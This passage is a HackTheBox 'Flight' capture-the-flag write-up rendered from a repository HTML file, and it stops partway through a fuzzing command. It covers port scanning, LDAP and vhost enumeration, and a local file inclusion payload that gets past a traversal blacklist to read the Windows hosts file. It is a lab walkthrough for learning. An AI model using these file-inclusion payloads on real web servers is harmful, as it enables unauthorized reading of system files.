-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathflight.html
More file actions
357 lines (314 loc) · 104 KB
/
flight.html
File metadata and controls
357 lines (314 loc) · 104 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Flight - HackTheBox Writeup (10.10.11.187) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Flight - HackTheBox Writeup (10.10.11.187)">
<meta name="description" content="Hard-difficulty Windows machine that covers forced NTLM authentication techniques through Remote File Inclusion and SCF file attacks. Lots of pivoting between service accounts and user accounts using web shells. Privilege escalation by abusing SeImpersonatePrivilege to perform token impersonation.">
<meta property="og:description" content="Hard-difficulty Windows machine that covers forced NTLM authentication techniques through Remote File Inclusion and SCF file attacks. Lots of pivoting between service accounts and user accounts using web shells. Privilege escalation by abusing SeImpersonatePrivilege to perform token impersonation.">
<meta property="og:image" content="https://www.hackthebox.com/storage/avatars/a7af9035e5089332dfbfeb328d663f3e.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.com/storage/avatars/a7af9035e5089332dfbfeb328d663f3e.png"></span>
</div>
<h1 class="Header__Title">Flight - HackTheBox Writeup (10.10.11.187)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Sat, Aug 12, 2023</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Hard">Hard</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/Windows">Windows</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/Forced_Authentication">Forced Authentication</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--gray">
<a href="tag/Token_Impersonation">Token Impersonation</a>
</span>
</div>
<div>
Hard-difficulty Windows machine that covers forced NTLM authentication techniques through Remote File Inclusion and SCF file attacks. Lots of pivoting between service accounts and user accounts using web shells. Privilege escalation by abusing SeImpersonatePrivilege to perform token impersonation.
</div>
</header>
<article id="https://www.notion.so/1e08c20a363a4ed884c197a4fb25036b" class="PageRoot"><h2 id="https://www.notion.so/f09c27f951f542b5ad12e2bd589d9489" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/f09c27f951f542b5ad12e2bd589d9489"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Preface</span></span></h2><div id="https://www.notion.so/b8d8fd74ed5e4d0ebf575eb637f88e60" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This was an incredibly challenging machine for me. Not only was the attack path extremely convoluted and more complicated than anything I had ever done, but there were quite a few techniques that I had not encountered before, namely the privilege escalation technique via </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">SeImpersonatePrivilege</code></span><span class="SemanticString">.</span></span></p></div><div id="https://www.notion.so/928d12a1296b46dea205cb2c24be49a0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Overall, this was a great learning experience. It made me really rethink the potential of forced NTLM authentication as a method of gaining initial access, especially if password policies are sloppy within an organisation. </span></span></p></div><h2 id="https://www.notion.so/b947bac4451b45d3b610bb4f90dbfd71" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/b947bac4451b45d3b610bb4f90dbfd71"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Reconnaissance</span></span></h2><div id="https://www.notion.so/8197287b6bdf46dfb23270e9beea5ac0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We start by doing a port scan to see what services we can access.</span></span></p></div><div id="https://www.notion.so/af739ab8dc9d4dfa9ec93230390e85af" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.11.187 | tee ports-tcp.nmap</code></span></span></p></div><pre id="https://www.notion.so/6f8b2ba1d8ce4ad4a3039bc9f314bfd3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Nmap scan report for 10.10.11.187
Host is up (0.030s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
5985/tcp open wsman
9389/tcp open adws</span></span></span></code></pre><div id="https://www.notion.so/a60a69dfaee240c9be09b07644473a0f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looks like lots of ports are open, let’s do a script and version scan to see what services are being hosted on these ports:</span></span></p></div><div id="https://www.notion.so/49a5fba0de2643bf9b3d372c1ce2e79d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,5985,9389 10.10.11.187 | tee targeted-tcp.nmap</code></span></span></p></div><pre id="https://www.notion.so/c262e885f57043debbe42d5402527d19" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Nmap scan report for 10.10.11.187
Host is up (0.031s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-21 20:11:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-01-21T20:11:15
|_ start_date: N/A
|_clock-skew: 6h59m58s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.09 seconds</span></span></span></code></pre><div id="https://www.notion.so/dbf711f1feab460b83e3d5b37834df1f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Under the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ldap</code></span><span class="SemanticString"> entry, we see that our target is an Active Directory domain controller for the domain “flight.htb”. Let’s add the target IP and hostname to our </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hosts</code></span><span class="SemanticString"> file:</span></span></p></div><div id="https://www.notion.so/db087fcfc10c4bd498e7b7b89f8ef3fe" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo nano /etc/hosts</code></span></span></p></div><pre id="https://www.notion.so/8de9b0701f514b58be472e13810c9b75" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.11.187 flight.htb</span></span></span></code></pre><h2 id="https://www.notion.so/43ca1da1fc5c432284f604cc333842f1" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/43ca1da1fc5c432284f604cc333842f1"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><div id="https://www.notion.so/06026a54e2f1499a9a20facac552b8a5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">LDAP enumeration</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/52d4e6ddfcfa44e4ad5a6dec66498e47" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Let’s begin by searching LDAP with simple authentication and see if we can obtain any information of interest:</span></span></p></div><div id="https://www.notion.so/85144712557745f6bacd25253653ba53" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ldapsearch -x -h flight.htb -s base namingcontexts</code></span></span></p></div><pre id="https://www.notion.so/dd947b83584f4ffebe8b8529ec29e955" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span># extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=flight,DC=htb
namingcontexts: CN=Configuration,DC=flight,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=flight,DC=htb
namingcontexts: DC=DomainDnsZones,DC=flight,DC=htb
namingcontexts: DC=ForestDnsZones,DC=flight,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1</span></span></span></code></pre><div id="https://www.notion.so/b4087373e4004dccae8fe87686bf7e9d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We get the domain naming context again, but we already have this information from the nmap scan. Let’s see if the server accepts anonymous bind with the query:</span></span></p></div><div id="https://www.notion.so/bcb94b768cde4426bacea54a7a175f31" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ldapsearch -x -h flight.htb -b "DC=flight,DC=htb"</code></span></span></p></div><pre id="https://www.notion.so/f2b9a76f1d6e4c30812cf8d1102c98ba" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span># extended LDIF
#
# LDAPv3
# base <DC=flight,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1</span></span></span></code></pre><div id="https://www.notion.so/786bb247717143789a3c0de7b7a3e243" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">No dice, anonymous bind is disallowed so let’s come back when we have some credentials.</span></span></p></div><div id="https://www.notion.so/151985eda82a424482d9c38ca03970e7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">HTTP enumeration</strong></strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/eca01d256afa4bd1a2eab6e589a26a1e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We continue our enumeration by exploring port 80. Navigating to the site:</span></span></p></div><div id="https://www.notion.so/b215525a0f1b4d11b6a03126e2f5caa8" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F575895a5-0cf8-4eba-b5a5-00c124efee3e%2FUntitled.png?width=1326&table=block&id=b215525a-0f1b-4d11-b6a0-3126e2f5caa8"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F575895a5-0cf8-4eba-b5a5-00c124efee3e%2FUntitled.png?width=1326&table=block&id=b215525a-0f1b-4d11-b6a0-3126e2f5caa8" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/f78f1c47c7ba4bc3bd9c8107cf16c183" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This site seems to be an air travel website with a flight planner app. However, none of the buttons seem to do anything so let’s move on and try to enumerate for subdomains:</span></span></p></div><div id="https://www.notion.so/557d473d6944481997c447da5076598b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster vhost -w ~/Desktop/HTB/Common/subdomains-top1million-110000.txt -u flight.htb</code></span></span></p></div><pre id="https://www.notion.so/5d0eabfc86f4401989113e7830560de8" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://flight.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/kali/Desktop/HTB/Common/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/01/21 23:47:10 Starting gobuster in VHOST enumeration mode
===============================================================
Found: school.flight.htb (Status: 200) [Size: 3996]</span></span></span></code></pre><div id="https://www.notion.so/86486b845fb245588c9480e30a531174" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">There is a hidden subdomain by the name </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">school.flight.htb</code></span><span class="SemanticString">, let’s add this to the line we made in our </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hosts</code></span><span class="SemanticString"> file earlier. Navigating to the new subdomain: </span></span></p></div><div id="https://www.notion.so/437e9c228f244f7d9184432693c6a67d" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fcca32028-6358-4010-9a68-0bbe4e2f441c%2FUntitled.png?width=1326&table=block&id=437e9c22-8f24-4f7d-9184-432693c6a67d"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fcca32028-6358-4010-9a68-0bbe4e2f441c%2FUntitled.png?width=1326&table=block&id=437e9c22-8f24-4f7d-9184-432693c6a67d" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/fa789f5c67814e0cbdc11a5ffee16d72" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It seems like our target also has a website for its aviation school, let’s keep exploring further…</span></span></p></div><h2 id="https://www.notion.so/479037d47b334eed9dfe7bf780ab4b74" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/479037d47b334eed9dfe7bf780ab4b74"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><div id="https://www.notion.so/0b851b3e842e4a409483ec467f166005" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">LFI vulnerability in “view” parameter</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></span></span></p></div><div id="https://www.notion.so/57e582b009f9496193299432d0a6171f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">While checking out the different pages, we notice in the URL bar that the website uses the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">view</code></span><span class="SemanticString"> GET parameter to specify the page it’s displaying:</span></span></p></div><div id="https://www.notion.so/01aa9bcc46b1481e903d9e1e36a634af" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://school.flight.htb/index.php?view=</code></span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code"><span class="SemanticString__Fragment SemanticString__Fragment--Unknown"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">about.html</strong></span></code></span></span></p></div><div id="https://www.notion.so/104d958a272342e8823dd83f478ebd49" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This is a somewhat peculiar way of displaying pages, and led me to think there could potentially be some form of a local file inclusion (LFI) vulnerability within that parameter. Let’s try to verify this by putting in some directory traversal characters, and since this is a Windows box, let’s see if we can reach its hosts file at </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C:/Windows/System32/drivers/etc/hosts</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/858621e83f6b49a0b26eabaa3d45d744" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://school.flight.htb/index.php?view=../../../../../../../Windows/System32/drivers/etc/hosts</code></span></span></p></div><div id="https://www.notion.so/cfcf3e61e6934f91a5ffa15a9a045b16" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F62ad1b7e-b6d4-41f3-813f-e8a5cd5533e9%2FUntitled.png?width=1034&table=block&id=cfcf3e61-e693-4f91-a5ff-a15a9a045b16"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F62ad1b7e-b6d4-41f3-813f-e8a5cd5533e9%2FUntitled.png?width=1034&table=block&id=cfcf3e61-e693-4f91-a5ff-a15a9a045b16" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/d41a99ac65f0452f9b692ac0eb524890" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Huh, looks like we hit some kind of a blacklist, let’s try to bypass it with some basic URL encoding:</span></span></p></div><div id="https://www.notion.so/bcc096cf1f294969bcfdf2a116d5844c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://school.flight.htb/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows/System32/drivers/etc/hosts</code></span></span></p></div><div id="https://www.notion.so/fab30cb120e0427ea5f3a70954ba1419" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It’s still blocking our request, how about if we try with absolute paths instead?</span></span></p></div><div id="https://www.notion.so/254ca79c474a4370b864001cdfd733f6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://school.flight.htb/index.php?view=C:/Windows/System32/drivers/etc/hosts</code></span></span></p></div><div id="https://www.notion.so/b657c029b9494a5a856e41603bc83b24" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F50345e43-c9d6-418e-b91c-dc9149ae78a3%2FUntitled.png?width=1034&table=block&id=b657c029-b949-4a5a-856e-41603bc83b24"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F50345e43-c9d6-418e-b91c-dc9149ae78a3%2FUntitled.png?width=1034&table=block&id=b657c029-b949-4a5a-856e-41603bc83b24" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/c39c7c0269ce4e22bdad8a310b398ca6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Worked like a charm! Looks like it was detecting the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">../</code></span><span class="SemanticString"> characters and blocking the request accordingly, but it seems like we didn’t need them anyway. We can now see the contents of the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hosts</code></span><span class="SemanticString"> file. Using this technique, we can fuzz for files on the system with a </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt">wordlist</a></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/f92c9c9bdf65481d97ff8c5ea2f8f18c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ wfuzz -f 